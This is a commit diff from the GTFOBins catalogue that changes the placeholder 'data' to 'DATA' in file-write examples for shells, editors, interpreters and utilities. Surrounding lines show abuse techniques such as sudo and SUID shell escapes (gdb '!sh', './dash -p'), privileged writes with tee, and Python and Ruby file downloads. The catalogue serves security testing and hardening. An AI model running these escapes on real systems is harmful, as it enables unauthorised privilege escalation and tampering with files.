Use DATA as a placeholder for file-write operations

2024-12-25 22:40:10 +01:00 · 2018-08-20 14:35:43 +02:00 · 2018-08-20 14:35:43 +02:00 · d4b50275bb
commit d4b50275bb
parent 866ca2e404
29 changed files with 36 additions and 36 deletions
--- a/_data/functions.yml
+++ b/_data/functions.yml
@ -75,11 +75,11 @@ load-library:
 file-read:
  label: File read
  description: |
-    It reads files and may be used to do privileged reads or disclose files
-    outside a restricted file system.
+    It reads data from files, it may be used to do privileged reads or disclose
+    files outside a restricted file system.

 file-write:
  label: File write
  description: |
-    It writes files and may be used to do privileged writes or write files
-    outside a restricted file system.
+    It writes data to files, it may be used to do privileged writes or write
+    files outside a restricted file system.
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@ -5,7 +5,7 @@ functions:
  file-write:
    - code: |
        export LFILE=file_to_write
-        ash -c 'echo data > $LFILE'
+        ash -c 'echo DATA > $LFILE'
  suid-enabled:
    - code: "./ash"
  sudo-enabled:
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@ -22,7 +22,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+        awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
  file-read:
    - code: |
        LFILE=file_to_read
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@ -39,7 +39,7 @@ functions:
  file-write:
    - code: |
        export LFILE=file_to_write
-        bash -c 'echo data > $LFILE'
+        bash -c 'echo DATA > $LFILE'
  file-read:
    - description: It trims trailing newlines and it's not binary-safe.
      code: |
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
@ -12,7 +12,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        busybox sh -c 'echo "data" > $LFILE'
+        busybox sh -c 'echo "DATA" > $LFILE'
  file-read:
    - code: |
        LFILE=file_to_read
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@ -5,7 +5,7 @@ functions:
  file-write:
    - code: |
        export LFILE=file_to_write
-        ash -c 'echo data > $LFILE'
+        ash -c 'echo DATA > $LFILE'
  suid-enabled:
    - code: "./csh -b"
  sudo-enabled:
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@ -5,7 +5,7 @@ functions:
  file-write:
    - code: |
        export LFILE=file_to_write
-        ash -c 'echo data > $LFILE'
+        ash -c 'echo DATA > $LFILE'
  suid-enabled:
    - code: ./dash -p
  sudo-enabled:
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@ -3,7 +3,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        echo "data" | dd of=$LFILE
+        echo "DATA" | dd of=$LFILE
  file-read:
    - code: |
        LFILE=file_to_read
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@ -8,7 +8,7 @@ functions:
    - code: |
        ed file_to_write
        a
-        data
+        DATA
        .
        w
        q
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@ -5,7 +5,7 @@ functions:
  file-write:
    - code: |
        emacs file_to_write
-        data
+        DATA
        C-x C-s
  file-read:
    - code: emacs file_to_read
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@ -11,7 +11,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+        gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
  sudo-enabled:
    - code: sudo gdb -nx -ex '!sh' -ex quit
 ---
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@ -39,7 +39,7 @@ functions:
  file-write:
    - code: |
        export LFILE=file_to_write
-        ksh -c 'echo data > $LFILE'
+        ksh -c 'echo DATA > $LFILE'
  file-read:
    - description: It trims trailing newlines.
      code: |
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@ -56,7 +56,7 @@ functions:
          f:write(d);
          io.close(f);'
  file-write:
-    - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);'
+    - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
  file-read:
    - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
  sudo-enabled:
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@ -9,7 +9,7 @@ functions:
    - description: Requires a newer GNU `make` version.
      code: |
        LFILE=file_to_write
-        make -s --eval="\$(file >$LFILE,data)" .
+        make -s --eval="\$(file >$LFILE,DATA)" .
  suid-enabled:
    - code: |
        COMMAND='/bin/sh -p'
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@ -12,7 +12,7 @@ functions:
  file-write:
    - code: |
        nano file_to_write
-        data
+        DATA
        ^O
  file-read:
    - code: nano file_to_read
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@ -12,7 +12,7 @@ functions:
  file-write:
    - code: |
        pico file_to_write
-        data
+        DATA
        ^O
  file-read:
    - code: pico file_to_read
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@ -9,7 +9,7 @@ functions:
    - description: The file path must be absolute.
      code: |
        export LFILE="/tmp/file_to_write"
-        puppet apply -e "file { '$LFILE': content => 'data' }"
+        puppet apply -e "file { '$LFILE': content => 'DATA' }"
  file-read:
    - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
      code: |
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@ -25,7 +25,7 @@ functions:
        export LFILE=file_to_save
        python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
  file-write:
-    - code: python2 -c 'open("file_to_write","w+").write("data")'
+    - code: python2 -c 'open("file_to_write","w+").write("DATA")'
  file-read:
    - code: python2 -c 'open("file_to_read").read()'
  load-library:
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@ -25,7 +25,7 @@ functions:
        export LFILE=file_to_save
        python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
  file-write:
-    - code: python3 -c 'open("file_to_write","w+").write("data")'
+    - code: python3 -c 'open("file_to_write","w+").write("DATA")'
  file-read:
    - code: python3 -c 'open("file_to_read").read()'
  load-library:
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@ -6,7 +6,7 @@ functions:
    - description: This adds timestamps to the output file. This relies on the external `echo` command.
      code: |
        LFILE=file_to_write
-        rlwrap -l "$LFILE" echo data
+        rlwrap -l "$LFILE" echo DATA
  suid-enabled:
    - code: ./rlwrap -H /dev/null /bin/sh -p
  sudo-enabled:
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@ -22,7 +22,7 @@ functions:
        export LFILE=file_to_save
        ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
  file-write:
-    - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+    - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
  file-read:
    - code: ruby -e 'puts File.read("file_to_read")'
  load-library:
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
@ -9,7 +9,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        sed -n "1s/.*/data/w $LFILE" /etc/hosts
+        sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
  file-read:
    - code: |
        LFILE=file_to_read
--- a/_gtfobins/shuf.md
+++ b/_gtfobins/shuf.md
@ -4,14 +4,14 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        shuf -e data -o "$LFILE"
+        shuf -e DATA -o "$LFILE"
  suid-enabled:
    - description:
      code: |
        LFILE=file_to_write
-        ./shuf -e data -o "$LFILE"
+        ./shuf -e DATA -o "$LFILE"
        sudo-enabled:
    - code: |
        LFILE=file_to_write
-        sudo shuf -e data -o "$LFILE"
+        sudo shuf -e DATA -o "$LFILE"
 ---
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@ -5,7 +5,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
+        sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";'
  file-read:
    - code: |
        LFILE=file_to_read
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@ -10,7 +10,7 @@ functions:
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
-        echo data > "$TF"
+        echo DATA > "$TF"
        tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
  file-read:
    - description: This only works for GNU tar.
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@ -4,13 +4,13 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        echo data | ./tee -a "$LFILE"
+        echo DATA | ./tee -a "$LFILE"
  suid-enabled:
    - code: |
        LFILE=file_to_write
-        echo data | ./tee -a "$LFILE"
+        echo DATA | ./tee -a "$LFILE"
  sudo-enabled:
    - code: |
        LFILE=file_to_write
-        echo data | sudo tee -a "$LFILE"
+        echo DATA | sudo tee -a "$LFILE"
 ---
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@ -9,7 +9,7 @@ functions:
  file-write:
    - code: |
        vi file_to_write
-        idata
+        iDATA
        ^[
        w
  file-read:
--- a/_gtfobins/vim.md
+++ b/_gtfobins/vim.md
@ -9,7 +9,7 @@ functions:
  file-write:
    - code: |
        vim file_to_write
-        idata
+        iDATA
        ^[
        w
  file-read:
--- a/_gtfobins/xxd.md
+++ b/_gtfobins/xxd.md
@ -3,7 +3,7 @@ functions:
  file-write:
    - code: |
        LFILE=file_to_write
-        echo data | xxd | xxd -r - "$LFILE"
+        echo DATA | xxd | xxd -r - "$LFILE"
  file-read:
    - code: |
        LFILE=file_to_read